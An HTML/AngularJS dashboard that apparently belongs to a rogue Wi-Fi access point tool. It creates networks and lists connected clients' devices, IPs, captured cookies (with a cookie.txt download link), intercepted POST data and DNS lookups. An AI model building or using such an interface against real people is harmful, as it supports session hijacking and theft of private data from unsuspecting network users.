<!DOCTYPE html> 
<html ng-app="wifis" ng-controller="indexController"  >
<head> 
<title>wifis ({{total_clients}})</title>
<script src="/js/components/jquery/dist/jquery.js"></script>
<script src="/js/components/jquery-ui/jquery-ui.js"></script>
<script src="/js/components/angular/angular.js"></script>
<script src="/js/components/bootstrap/dist/js/bootstrap.min.js"></script>
<script src="/js/app.js"></script>
<script src="/js/index.js"></script>
<link rel="stylesheet" href="/js/components/bootstrap/dist/css/bootstrap.min.css" media="screen" />
<!-- <link rel="stylesheet" href="/js/components/font-awesome/css/font-awesome.min.css" /> -->
<link rel="stylesheet" href="/css/main.css" />
</head>
<body>
    <div class="container">
    <form>
    name: <input ng-model="create_essid" > timeout: <input type="number" ng-model="create_timeout" value="30" /> password: <input ng-model="create_password" type="password" >
    <button ng-click="create()" >Create</button>
    </form>
    
      <ul>
      <li ng-repeat="interface in status">
        <h3><img src="/img/locked.png" alt="locked" ng-if="interface.wpa2"> {{interface.ssid[0]}} </h3> {{interface.status}}
        <div>
          {{interface.inactivity}} / {{interface.timeout}}
        </div>
        <ul>
          <li ng-repeat="(mac, client) in interface.clients">
            <b/>{{client.name}}</b> {{mac}} <b>{{client.ip}}</b><br/>
            {{client.inactivity}}<br/>
            <b>{{client.device.brand}}</b> {{client.device.model}}<br/>
            <div ng-if="client.cookies.length > 0">
              Cookies:
              <ul>
                <li ng-repeat="cookie in client.cookies">
                  <a href="/cookie.txt?bssid={{mac}}&host={{cookie}}" >{{cookie}}</a>
                </li>
              </ul>
            </div>
            <div ng-if="client.services.length > 0">
              Services:
              <ul>
                <li ng-repeat="(name,service) in client.services">
                  {{service.type}} {{name}}
                </li>
              </ul>
            </div>
            <div ng-if="client.post.length > 0">
              Post:
              <ul>
                <li ng-repeat="post in client.post">
                  {{post}}
                </li>
              </ul>
            </div>
            <button ng-if="client.dns.length > 0" ng-click="showdns = !showdns" >Toggle dns ({{client.dns.length}})</button>
            <div ng-show="showdns" >
              <ul>
                <li ng-repeat="host in client.dns">
                  {{host}}
                </li>
              </ul>
            </div>
            <hr/>
          </li>
        </ul>
      </li>
    </ul>
    </div>
</body>
</html>